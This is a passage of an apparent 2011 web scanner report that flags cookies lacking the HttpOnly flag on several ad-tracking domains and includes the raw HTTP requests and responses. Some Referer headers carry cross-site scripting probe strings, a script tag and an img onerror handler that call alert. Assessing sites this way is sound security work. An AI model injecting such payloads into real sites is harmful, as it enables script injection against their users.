OuHpFOA1pO1YY9xpWyYg6bhGYSyukJ9jxxM1x6qhi5mLBhvo8a1HTvQTZMC0o/HK+7tLhzPdDM+hTYWisTFw8/QVkhQ+wcbbEwOxhcU73M6QervSnu/q9Dq9+72SG+a2W+PLWrKgOExYBUsBOWpfyVUCb0ASJyPeTOShSVhaQ+fCBvu3XUPxGaOzpGoVD3dQkBOpy5C+1PgxsexVbXgZjAUSQQSfBssmqLcDaVpLyxs+Qopl4Kn563r+MBJgq6zq/TwkNvi/qCkpyT863ibLn3vMNFkJ//YQej4a1f1nAYsSi+KPX8m4ccideWG+VIWkdIeml4cyFsqF+rwR7f62ebxite6HhDXOQZW7V3XjcIb99328u1In9UmhJ6IOYCM3pMZvBgFi5Bq1sp7ZGCqUTRNOzygkzeI6RIYZZ0LlAJpYUQbqlROZdomQThaWYnoIHQ3MS3AA6rHcslHFCVSAuglUFRCsjlstdv++yQ96TcbUvSKhgGjcUjJD0R6kXUu8bCV; rsiPus_GIay="MLsX8FUNJi5nYDzKoFXYD5Xqgs9Mt/zQWVmaZnsSPOV+NTAxTO25Y3T/9SQCORKEN6trqtGErYp7YMOZ4gRNmft7PvpFTCRWTeAAZOovdb2Hswki2CYStlPjDtE+QTJgyxFyb3LQbz0Q/4ASjJnYEdCYgMvPNzTQDdcRktuap7MHr33Qj7kHYZlCuhGo6u4Tf8xFAHYXSwblIXtOaCNYGnJpClQH6GxSbBZ40L5aXvMtS+lg9I0Tr72kVpPYohOUANno6wrm7VqOw5LfOAQcxCnQxU7GIQiB8QGl/+NMYJwK0KX0/59Qc0x16AazPy+DXDuG7DJ8Mt9ZdknkvrOVhmT22fDw1X5IMQpC/yyvNZkofE3w6gomw+JONvXHgJQtL7O6/NVgInSpPwwmTuIjHE1FilDtHV1c0MKpgyhxEp9goNwAYQ0etDyunPKku+ck+TMoLK6df8KR1mcnSiaWsEfTZLo89iWrcnpDvP9xNmb7dO+UD3/PdRH2tiDrBDQqZTr6j9tlNjshvU7ky7luRDMgUvLlW08opyn0lUA2NaanUIqdu1KJGEvexyQ="; rsiPus_bidr="MLsX8FUNZj5nYDzKoFXYD5XqQrD3lf1+z1kmf5BdciMmNzGYQjNHLUE0d4xc0atycnxriO/0KZsoBpFupKZeMV7PfenFRPSpJ/B4XgMSWbpi1BixTbs+6iE5ayH6sfeVBDclfcs7aQzynEzZjpFO2BifjtnrlgbTChMVuJmyxZlnZJ1Jh0NtGXm/EpSJp0omr+9GZdbSF6Lzp+fuZH/aY3FZzJ206fbqaCaoBVgjZvPh4OiipROUIctrlTKObVBANgHgHKqeOZmOp3x+/GgWJgye8kOJv4yIdxSGGqloCT5ZWYHDXabtP/R4bpW0t8lOpdx4JWr2wW0zNFFSOgvZsY+PEhbY6ZnXmCpK8FO3FiEiK8ZL/uLNwqQ/DE0LGLE8BTRtrGhYXkVbBc1I8E0+yAu8ze2P7gZb34/JRe/uGeNZI0v6jCUqtq9HmUsUN8UECWWHAJRIiM/NMGD77IG0rlwlEqETOz1Hg8WWQkD6xwHNXK1A43tBQ9JN9Egnh8Iblexu8i5FN3aBwUvFNQk730pyK5mClxbvL+KXSj44prIJw5K9W5RLXhCBHw=="; rsi_us_1000000="pUMd4z9HMAYYbm+istsgxv7+mvc+cC1B+3tY0F6r9vSLrFABPuZI6YchRbl7qd+XW2hVt/QdtrdYgNuGDVCDBRsQZctaVDqAIKiiRkGNdVfKQRM8nhjDEuJXKWPfICrLmmSRp8Mhr3ShN+eWDTnY3HJ8+VSks4XYl3avQ7Hur+r93FheUrahkUxj6ZmGZWu4dW0XBls+YrSPa+PUrAoGk1EXk81+r5BmpkCnF3yUB4TdaxjvEgFIkI/4md4hO6+dVtvUaguMpm5t+BOzorDKXqL2mGfZWjiRB/BUL10dY8QU9delsnaA3ueClTU5rQ4gMPiWxhe3k1XhHzPNuscshJdH6ut4yPA4WJvwOI0FK0U/Ny+uqFpb9WT71MQft1hknAOluSAtoVkbH9omakq+YUBLESH+2BIyUDaV4dvKJk/YmZAHcIxIbYxWZjzBS/tDDbPZDcxmiFTy7dHLj8ZQerR0v/iA/voS7SMUk2d/8fo4Uh1leIJQ+BMCZ7P1s6XLdi6X34IthsAbqidjXvWiaeSZCzLwayDDZ+WPkUaoOMWNXg2XhAtw5Kaz05to0ltFxB7FbsprP9GNc21uwNlcJK2yrt4PyiAUjRmsmn3vLo9xoADhkKtsFbCuihMj6/zbB19MExHT2BDrGqHz/rVvCWtFZmYI3+0TW8mOvFwqUtWd+Ylp0Rn4ZuPHupXFIxs49jNd2zPy+IVXKacgjpIj/K/X1IaRp+PaNRydlkyFh+SH3S/dxCBtVRtQNRXLQOOZ3SJsVqFH4wBa6pvVJ9O9oY7hiTz6dXOV0Nzf351eYHRVBy2/94rZxtGWauVgEmSWUp/fUk5/qw/Os28Kj0jvGbSL6y3Nakem+bRQy/F/a5Ukwdimx9QiY3rpIWLyMmptlSDMNxilrJvtellnbqHxJ2bVgbQGO6I2AvNjtKl4oyoIK3seOfPUtNZ3vwPyTFdA2MVJ3RB7L5DkRjAcv6RuOt8Eh5+jCwwnWcutVahdAzXkSyeu0e6zhp7BEXirYP9AgHOFqTdtU3L3UqnLDhaFzIwBsoaizXfbkdpf8y1GR0RaFtqp/IThvUXEPBxd0eZAz+V7oc9eMe0kvWilgxd0yqa8p1yB5xmxgebe9ZoXt8Hhp/CMtOxhICS7seBpKJ0Slh6tXNhg6RSXqYRbt7aS88qtdBRC9eKqnQ=="; rsi_segs_1000000=pUPFJk+B73IM1p94u+w/VXTPWv/4lqXpA6GHJmbgusJbus3Mx+p24I1oDZUZb5s27P+ai79l7ni6EqU0UjR/LajAVpfU/0/yivwWy7CCuk/LdbJkwc/2D3eg8kPC99AbBTxElA1fdUST18Pst5/sOuODR6gvBT50j9ah/ZKEkRLqz+rBietPxjUalq+Y1WWc2iBa8iLTlsKi0FbdV7pJ4k+HRzFBUr8Lfl4uOyVSHF1S51gps6VKZfxsQrxH5Z86gMsRlBeV6VKhF1jTGOkscvri6srHhhKcBMJOCCs+Ip+MEelaaYPgGsmz9cHJzB8ftFrmg/JwxNmjwluFdrKubkbynWjrrySZH9UTZSMz; NETSEGS_K08784=e98f30f2b8e2390e&K08784&0&4e99b6b4&0&&4e73fec3&239be0b9fdae6d2fbd805afcd850cfc7; rtc_ZVG6=MLvv9aMOYT5n5fgbA5zKZLneWRTAxbuxebXlxUcjzcXGSuZyPt6fFu3OMJQ9F3Bxzw8u0eGHRiclcyshyEZ1qHhG2V8spU6IKrZCkCNniKtWmluF6ggxz6ZKxwokHVbftCFbJGN72TfsNURrZAk2e/h/zok1/7Q8idLTjDR+5Sk2AB2y7X9Qvk+B1fiKnyrl4C6f7/hOPjrPVDaZ13CaSq2iUKTWvwqgILldJdo9tSxC4qdf1k8dk2ORHN7T3cnvcgo84QMYEeiYQYSD4lN4akmSTZWpOBOugeYG4CvGobmA/MZeHJxUyzUtrr9eVJGwStW4VDmUZQ1a5wqbg4F1ESMPvOjRUpJhowa6YGxLHpt79nIBj7cWDZauHEVNg3QfMOPFtBxdCcShmVlL3IjAmRwE9cfwfzHt9m3QWJmPkKoYFi+pAGIp0gYkheZGssNc9IbT/1LdfwJlijkYGYsG7RqGyN0afnD/cpHF58tM7xwNGIYH3b8KHdhadk72ovy13lJzV7JclcE61i6MgVaPbMz+FPtQT46ikQ2eEVQHnDVaRtm/qJAfsVjdWyiY6Js8fhIUbGLbaDA2hclaajEIMuQ3WRSL5cLW6NuEVTTpIv3u/65jY3rStpVD4qSM7550SPYXV3piHZb/gfYkKZ/zCOmyYbBsVXSkBU/ABGHd/GljMSOyc2muRhrqXVEsZAWXww5JbD67UOseMoVq/Glde1NTaNyFbfF3T7Nuvkerww==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_K05540=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_H07707=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_J08778=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_I09839=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_F10931=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GIay=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bidr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_K08784=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5Pgf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QtPe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-pls=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BpKU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2mmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VWpZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MO0D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6FJN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OwLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6aEY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wk0L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lz28=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ADAg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dt_u=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_F09828=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0MQb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_O-nx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dTM3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0e37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OBX-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMfn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_diSQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FTuL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Iryv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__deo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VDO5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p4rD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_E62i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gguo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1DL4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_x1cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Nflk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_llan=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cb7a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OHDN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lGt5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oMIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vzBk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BXlt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3RaR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CD4S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_THGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cpgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zmcn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ugQd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HVo3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lrcG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPLC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s5oP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZICR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_58zC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YvdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PzoB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8aSl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pLLd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_W_VD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3AvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_855R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uED1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2AG3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sI9w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zufq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_C07583=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lPhe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EdrF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Wed, 09-Sep-2043 17:15:59 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sat, 17 Sep 2011 17:15:58 GMT

13.149. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.1835902 HTTP/1.1
Host: px.owneriq.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 17:19:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net

13.150. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1315756063; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:23 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Mon, 16-Sep-2013 16:32:23 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.151. http://r.skimresources.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /api/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/?callback=skimlinksApplyHandlers&data=%7B%22pubcode%22%3A%22905X224440%22%2C%22domains%22%3A%5B%22rachelroy.com%22%2C%22endless.com%22%2C%22temptalia.com%22%2C%22sephora.com%22%2C%22facebook.com%22%2C%22twitter.com%22%2C%22digg.com%22%2C%22myspace.com%22%2C%22new.facebook.com%22%2C%22sweepstakes.womansday.com%22%2C%22services.hearstmags.com%22%2C%22caranddriver.com%22%2C%22cycleworld.com%22%2C%22elledecor.com%22%2C%22roadandtrack.com%22%2C%22womansday.com%22%2C%22glo.msn.com%22%5D%7D HTTP/1.1
Host: r.skimresources.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:35:40 GMT
P3P: policyref="http://skimlinks.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: Apache
Set-Cookie: skimGUID=af7c6cccf2814117102a6929c45f1eb3; expires=Tue, 14-Sep-2021 16:35:40 GMT
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
X-SKIM-Hostname: api04.angel.skimlinks.com
Content-Length: 132
Connection: keep-alive

skimlinksApplyHandlers({"merchant_domains":["sephora.com","endless.com"],"guid":"af7c6cccf2814117102a6929c45f1eb3","country":"US"});
13.152. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C2%7C5%7C1001%7C1004; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Set-Cookie: rds=15202%7C15202%7C15202%7C15202%7C15234%7C15202%7C15202%7C15194%7C15223%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:42:09 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/
Content-Length: 0
Date: Sat, 17 Sep 2011 16:42:08 GMT

13.153. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.8992394 HTTP/1.1
Host: rp.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ra1_uid=4639578929876828096; ra1_sid=22

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1316280015154
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711652369746398528; Expires=Sun, 16-Sep-2012 17:20:15 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=2; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:20:15 GMT; Path=/; Domain=gwallet.com; Version=1

13.154. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

